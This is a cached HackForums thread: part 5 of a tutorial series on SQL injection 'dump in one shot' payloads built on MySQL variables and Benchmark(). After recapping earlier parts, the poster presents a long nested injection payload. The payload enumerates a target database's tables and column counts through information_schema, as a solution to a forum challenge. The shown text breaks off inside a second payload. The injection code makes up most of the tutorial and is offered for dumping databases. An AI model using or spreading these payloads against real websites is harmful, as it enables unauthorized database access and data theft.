<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=4174318" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=4174318" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=4174318</a>. It is a snapshot of the page as it appeared on 15 Apr 2014 23:06:49 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=4174318" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:VjRJzuEJZesJ:www.hackforums.net/showthread.php%3Ftid%3D4174318&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>[SQLi tutorial] dump in one shot with Benchmark() - part #5 - Page 1</title> <meta name="description" content="SQL Injection Attacks-[SQLi tutorial] dump in one shot with Benchmark() - part #5"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=4174318"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 04-15-2014, 03:06 PM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/logo_bl.gif" alt="Hack Forums" title="Hack Forums"></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">[SQLi tutorial] dump in one shot with Benchmark() - part #5</span></div><br><div class="quick_keys"><div class="float_left"></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=4174318" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/rating.js"></script><div id="success_rating_4174318" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_4174318"><li style="width: 0%" class="current_rating" id="current_rating_4174318">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=4174318&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4174318&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4174318&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4174318&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4174318&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_4174318" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_4174318_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=4174318" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=4174318&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_4174318");
// -->
</script><div><strong>[SQLi tutorial] dump in one shot with Benchmark() - part #5</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid39512133" id="pid39512133"></a><table class="tborder" style="border-top-width: 0; " id="post_39512133" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">Today, 02:59 PM <span id="edited_by_39512133"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4174318&amp;pid=39512133#pid39512133">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <a href="http://www.hackforums.net/online.php" title="Online"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/buddy_online.gif" alt="Online" border="0"></a><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 165<br>Posts: 2,239<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">225</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/sticky-bro.png" alt="Sticky Man" title="Sticky Man"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_39512133">In <a href="http://www.hackforums.net/showthread.php?tid=4134016" target="_blank"><span style="text-decoration: underline;">part #1</span></a> of this tutorial I explained how to use function <span style="color: #32CD32;"><span style="font-weight: bold;">Benchmark()</span> </span>for <span style="color: #FFD700;">dump in one shot (DIOS)</span>. See in my tutorials what DIOS is - starting <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">here</span></a>.<br><br>In <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4137953" target="_blank">part #2</a></span> we were talking about <span style="color: #FFA500;">more complex</span> use of <span style="color: #FFD700;">DIOS with Benchmark()</span>.
 We saw triple DIOS (with two nested DIOS). From that tutorial we 
learned we can't use data stored in variables in one DIOS also in some 
other DIOS. They are local to each DIOS syntax. That is true for 
standard <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">DIOS</span></a>. <span style="color: #FFD700;">The most important thing to remember was</span> <span style="color: #32CD32;">when using benchmark based DIOS</span> <span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #FFA500;">we can</span></span></span> <span style="color: #FFD700;">use data stored in variables in different DIOS.</span><br><br>In <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4148766" target="_blank">part #3</a></span> I explained a way to combine standard <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">DIOS</span></a> with <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4134016" target="_blank">benchmark based DIOS</a></span>. That knowledge you will need to solve my challenges <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4098547" target="_blank">#95</a></span>, <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4107862" target="_blank">#96</a></span> and <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4114967" target="_blank">#97</a></span>. In <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4148766" target="_blank">part #3</a></span> I explained how to solve challenge <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4098547" target="_blank">#95</a></span> with transfer of simple local variables between different DIOS syntax.<br><br>In <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4153506" target="_blank">part #4</a></span> I explained how to transfer data from <span style="color: #FFD700;">few variables</span> from standard <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">DIOS</span></a> to <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4134016" target="_blank">benchmark based DIOS</a></span>.
 We built a special variable where we added data to it in every 
iteration. That variable we used later for searching with function <span style="color: #00BFFF;">find_in_set()</span>.
 That function expect a string list composed of substrings separated by 
comma. Because of that beside table name from each iteration we added 
comma after it.<br><br>In <span style="color: #FFA500;">part #5</span> I will explain how to use benchmark for some other tasks (beside dumping databases, tables, columns, data).<br><br><hr><br><span style="font-size: xx-large;"><span style="font-weight: bold;"><span style="color: #FFA500;">Challenge</span> <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4114967" target="_blank">#97</a></span></span></span><br><br>Tasks in that challenge were:<ul><li>display numbered list with table names in ascending order for tables they have even columns count</li> <li>display numbered list with table names in ascending order for tables they have odd columns count<br></li></ul>Strategy to solve that challenge is same as already explained in tutorial <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4153506" target="_blank">part #4</a></span>.<br><br>The only difference is we need two compound variables. In first one (<span style="color: #FFD700;">@tbl_even</span>) we will store table names where columns count is even. We can do that with standard <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">DIOS</span></a>:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)<br>&nbsp;&nbsp;</span><span style="color: #66CCFF">from<br>&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),(@</span><span style="color: #66CCFF">rn</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">),(@</span><span style="color: #66CCFF">tbl</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),(@</span><span style="color: #66CCFF">cnt</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(@</span><span style="color: #66CCFF">tbl_even</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),(@</span><span style="color: #66CCFF">tbl_even_cnt</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">from</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">columns</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">where<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">database</span><span style="color: #7AC07C">())and(</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">in<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if((@</span><span style="color: #66CCFF">tbl</span><span style="color: #7AC07C">!=</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">),&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">concat<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(if(@</span><span style="color: #66CCFF">tbl</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(if(</span><span style="color: #66CCFF">MOD</span><span style="color: #7AC07C">((@</span><span style="color: #66CCFF">cnt</span><span style="color: #7AC07C">:=(</span><span style="color: #66CCFF">select&nbsp;count</span><span style="color: #7AC07C">(*)&nbsp;</span><span style="color: #66CCFF">from&nbsp;information_Schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">columns&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;where&nbsp;table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">database</span><span style="color: #7AC07C">()&nbsp;and&nbsp;</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">=@</span><span style="color: #66CCFF">tbl<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;),</span><span style="color: #66CCFF">2<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">)=</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">,&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">Concat<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if((@</span><span style="color: #66CCFF">tbl_even_cnt</span><span style="color: #7AC07C">:=@</span><span style="color: #66CCFF">tbl_even_cnt</span><span style="color: #7AC07C">%</span><span style="color: #66CCFF">2b1</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(@</span><span style="color: #66CCFF">tbl_even</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">tbl_even</span><span style="color: #7AC07C">,</span><span style="color: #FF99FF">','</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">0x00&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">0x00<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;&nbsp;&nbsp;)</span><span style="color: #66CCFF">x<br></span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div><br>For testing if column count is even we used MOD() function. In that case we increased our counter for tables with <span style="color: #32CD32;">even columns count</span> and store table name to compound variable <span style="color: #FFD700;">@tbl_even</span>.<br><br>With:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">y</span><span style="color: #7AC07C">)<br>&nbsp;&nbsp;</span><span style="color: #66CCFF">from<br>&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">y</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: 